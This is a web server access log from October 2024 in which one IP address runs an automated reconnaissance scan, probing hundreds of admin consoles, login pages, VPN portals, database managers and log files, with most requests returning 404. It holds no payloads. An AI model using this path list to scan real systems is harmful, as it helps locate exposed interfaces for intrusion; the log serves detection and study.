195.164.49.69 - - [20/Oct/2024:16:38:49 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:38:51 +0000] GET /templates/login.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:38:53 +0000] GET /lam/templates/login.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:38:57 +0000] GET /DocuWare/Identity/Account/Login HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:38:57 +0000] GET /web HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:38:59 +0000] GET /geoserver/web/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:39:01 +0000] GET /iclock/accounts/login/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:39:03 +0000] GET /iclock/accounts/login/?next=/iclock/data/iclock/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:39:05 +0000] GET /phpminiadmin.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:39:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:09 +0000] GET /AirWatch/Login HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:39:11 +0000] GET /wp-app.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:39:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:15 +0000] GET /static/dist/assets/icons/icon.png HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:16:39:17 +0000] GET /era/webconsole/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:39:19 +0000] GET /sfiler/Login.action HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:39:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:27 +0000] GET /clusters/local HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:39:27 +0000] GET /api/v1/info HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:39:29 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:39:32 +0000] GET /app/template/Login.vm HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:39:34 +0000] GET /centreon/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:39:35 +0000] GET /sslvpn/Login/Login HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:39:37 +0000] GET /Login/Login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:39:39 +0000] GET /explore HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:39:41 +0000] GET /api/v4/projects HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:39:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:45 +0000] GET /names.nsf HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:39:47 +0000] GET /webredir.nsf HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:39:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:39:51 +0000] GET /CACHE/sdesktop/install/start.htm HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:39:53 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:39:57 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:39:57 +0000] GET /console/index.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:40:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:40:02 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:40:03 +0000] GET /application/index.html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:40:05 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:40:07 +0000] GET /systemstatus.xml HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:40:09 +0000] GET /servicedesk/customer/user/login HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:40:11 +0000] GET /servicedesk/customer/portal/10/user/login HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:16:40:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:40:15 +0000] GET /sonicui/7/login/ HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:40:17 +0000] GET /auth.html HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:40:19 +0000] GET /vpn/index.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:40:21 +0000] GET /uddiexplorer/ HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:40:23 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:40:25 +0000] GET /admin/airflow/login HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:40:27 +0000] GET /go/auth/login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:40:29 +0000] GET /portal/login HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:40:31 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:40:33 +0000] GET /logon/LogonPoint/tmindex.html HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:40:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:40:37 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:40:39 +0000] GET /login.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:40:41 +0000] GET /kiali/api/status HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:40:43 +0000] GET /kiali/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:40:45 +0000] GET /access.log HTTP/1.1 404 1084
83.212.98.101 - - [20/Oct/2024:16:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:40:47 +0000] GET /log/access.log HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:40:49 +0000] GET /logs/access.log HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:40:51 +0000] GET /application/logs/access.log HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:40:53 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:40:55 +0000] GET /Default.aspx?pid=Login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:40:57 +0000] GET /nagios HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:40:59 +0000] GET /nagios3 HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:41:01 +0000] GET /laravel-filemanager?type=Files HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:41:03 +0000] GET /EWS/Exchange.asmx HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:41:05 +0000] GET /owa/service.svc HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:41:07 +0000] GET /browser/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:41:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:41:11 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:41:13 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:41:15 +0000] GET /login_up.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:41:17 +0000] GET /RDWeb/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:41:19 +0000] GET /wabam HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:41:21 +0000] GET /wabam/favicon.ico HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:41:23 +0000] GET /logon/LogonPoint/index.html HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:41:25 +0000] GET /logon/LogonPoint/custom.html HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:41:27 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:41:29 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:41:31 +0000] GET /ocpu/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:41:33 +0000] GET /sidekiq HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:41:35 +0000] GET /login/?next=/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:41:37 +0000] GET /admin/login/?next=/admin/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:41:39 +0000] GET /Login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:41:41 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [20/Oct/2024:16:41:43 +0000] GET /appliance/login.ns HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:41:45 +0000] GET /cp/Shares?user&protocol=webaccess&v=2.3 HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:41:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:41:48 +0000] GET /http/index.html HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:41:51 +0000] GET /StudioServer/server/apps/login.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:41:53 +0000] GET /server/apps/login.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:41:55 +0000] GET /404 HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:41:57 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:41:59 +0000] GET /otobo/index.pl HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:42:01 +0000] GET /ui/login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:42:02 +0000] GET /NmConsole HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:42:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:42:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:42:08 +0000] GET /portal/webclient/index.html HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:42:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:42:14 +0000] GET /auth/admin HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:42:16 +0000] GET /auth/admin/master/console/ HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:42:18 +0000] GET /hub HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:42:20 +0000] GET /resources/autogenerated/product-info.json HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:16:42:22 +0000] GET /carbon/admin/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:42:24 +0000] GET /ws_ftp.log HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:42:26 +0000] GET /WS_FTP.LOG HTTP/1.1 404 1084
83.212.98.101 - - [20/Oct/2024:16:42:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:42:28 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:42:30 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:42:32 +0000] GET /enginemanager/ftu/welcome.htm HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:42:34 +0000] GET /portal/portalhelp/en/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:42:36 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:42:38 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:42:40 +0000] GET /ServiceCenter/Login.aspx HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:42:42 +0000] GET /login?redir=/ng HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:42:44 +0000] GET /api/xml HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:42:46 +0000] GET /login.jsp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:42:48 +0000] GET /cgi-bin/luci HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:42:50 +0000] GET /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:42:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:42:54 +0000] GET /identification.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:42:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:42:58 +0000] GET /dashboard/auth/login HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:43:00 +0000] GET /apiclient/index.jsp HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:43:02 +0000] GET /pki/images/keyManager_title.ico HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:43:04 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:43:06 +0000] GET /login.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:43:08 +0000] GET /login.do HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:43:11 +0000] GET /users/auth/saml/metadata HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:43:13 +0000] GET /netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:43:15 +0000] GET /web/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:43:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:43:17 +0000] GET /admin/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:43:17 +0000] GET /_phpmyadmin/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:43:17 +0000] GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:16:43:18 +0000] GET /apache-default/phpmyadmin/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:43:18 +0000] GET /blog/phpmyadmin/ HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:43:18 +0000] GET /forum/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:43:18 +0000] GET /php/phpmyadmin/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:43:18 +0000] GET /typo3/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:43:19 +0000] GET /phpmyadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:43:22 +0000] GET /phpMyAdmin/index.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:43:23 +0000] GET /xampp/phpmyadmin/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:43:23 +0000] GET /phpMyAdmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:43:23 +0000] GET /phpma/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:43:44 +0000] GET /portal.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:43:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:43:48 +0000] GET /login.jsp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:43:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:43:52 +0000] GET /photo/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:43:54 +0000] GET /SphinxAuth/Account/Login HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:43:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:43:58 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:44:00 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:16:44:02 +0000] GET /openadmin/index.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:44:04 +0000] GET /sws/index.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:44:07 +0000] GET /accounts/login/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:44:09 +0000] GET /manager/signin HTTP/1.1 404 1543
195.164.49.69 - - [20/Oct/2024:16:44:11 +0000] GET /steve/manager/signin HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:44:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:14 +0000] GET /?path=/settings/about HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:18 +0000] GET /cgi-bin/cgiServer?worker=LoginForm HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:44:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:22 +0000] GET /favicon.ico HTTP/1.1 200 21630
195.164.49.69 - - [20/Oct/2024:16:44:24 +0000] GET /images/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:44:26 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:44:28 +0000] GET /kfm/index.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:44:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:32 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:44:34 +0000] GET /signin HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:44:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:38 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:44:40 +0000] GET /app/kibana HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:44:42 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:44:45 +0000] GET /zdm/login_xdm_uc.jsp HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:44:46 +0000] GET /iam/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:44:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:44:50 +0000] GET /archibus/login.axvw HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:44:52 +0000] GET /archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:16:44:54 +0000] GET /login/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:44:56 +0000] GET /login/pre_login_agreement HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:44:58 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:45:00 +0000] GET /minio/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:45:02 +0000] GET /graph HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:45:04 +0000] GET /prometheus/graph HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:45:06 +0000] GET /phpLogin.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:45:08 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:45:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:12 +0000] GET /front/privateLogin.jsp HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:45:14 +0000] GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:45:16 +0000] GET /auth-sign-in?appUri=%2F HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:45:19 +0000] GET /webconsole/webpages/login.jsp HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:45:21 +0000] GET /userportal/webpages/myaccount/login.jsp HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:45:22 +0000] GET /index.php/Home/login/index.html HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:45:24 +0000] GET /+CSCOE+/logon.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:45:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:28 +0000] GET /ui/ HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:45:30 +0000] GET /downloader/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:45:32 +0000] GET /solr/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:45:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:36 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:45:38 +0000] GET /versa/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:45:40 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:45:42 +0000] GET /em/console/ias/oc4j/home HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:45:44 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:16:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:45:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:47 +0000] GET /phpldapadmin HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:45:49 +0000] GET /htdocs/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:45:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:45:55 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:45:57 +0000] GET /static/img/icons/favicon-32x32.png HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:45:59 +0000] GET /ui/sessions/signin HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:46:01 +0000] GET /crowd/console/login.action HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:46:03 +0000] GET /docs HTTP/1.1 302 -
195.164.49.69 - - [20/Oct/2024:16:46:05 +0000] GET /redoc HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:46:07 +0000] GET /openapi.json HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:46:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:13 +0000] GET /manager/html HTTP/1.1 401 2499
195.164.49.69 - - [20/Oct/2024:16:46:15 +0000] GET /host-manager/html HTTP/1.1 403 3022
195.164.49.69 - - [20/Oct/2024:16:46:17 +0000] GET /hdstat.htm HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:46:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:21 +0000] GET /ocsreports HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:46:23 +0000] GET /dashboard/auth/login/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:46:25 +0000] GET /horizon/auth/login/?next=/horizon/ HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:46:27 +0000] GET /auth/login/?next=/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:46:29 +0000] GET /login.cgi?uri=/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:46:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:33 +0000] GET /app/login.aspx HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:46:35 +0000] GET /signin/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:46:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:39 +0000] GET /authorization.do HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:46:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:43 +0000] GET /css/footer.js HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:46:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:46:47 +0000] GET /vnc.html HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:47:02 +0000] GET /bonita/login.jsp HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:47:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:47:06 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:47:08 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:47:10 +0000] GET /pwdform.htm HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:47:12 +0000] GET /status.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:47:14 +0000] GET /console/index.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:47:16 +0000] GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://sdc.iopan.pl:80/ecp HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:47:17 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:47:19 +0000] GET /mifs/login.jsp HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:47:21 +0000] GET /mifs/user/login.jsp HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:47:23 +0000] GET /mifs/c/d/android.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:47:25 +0000] GET /dashboard/ HTTP/1.1 404 1088
83.212.98.101 - - [20/Oct/2024:16:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:47:27 +0000] GET /ssf/s/portalLogin HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:47:29 +0000] GET /index.php?owa_do=base.loginForm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:47:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:47:33 +0000] GET /euweb/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:47:35 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:47:37 +0000] GET /appsuite/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:47:39 +0000] GET /Main_Login.asp HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:47:41 +0000] GET /jasperserver/login.html?error=1 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:47:43 +0000] GET /jasperserver-pro/login.html?error=1 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:47:45 +0000] GET /jupyter/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:47:47 +0000] GET /jupyter/lab HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:47:49 +0000] GET /jupyter/hub/lti/launch HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:47:51 +0000] GET /hub/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:47:58 +0000] GET /documentation HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:48:00 +0000] GET /documentation/login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:48:00 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:48:02 +0000] GET /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:48:04 +0000] GET /adminer/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:48:06 +0000] GET /editor.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:48:08 +0000] GET /mysql.php HTTP/1.1 404 1083
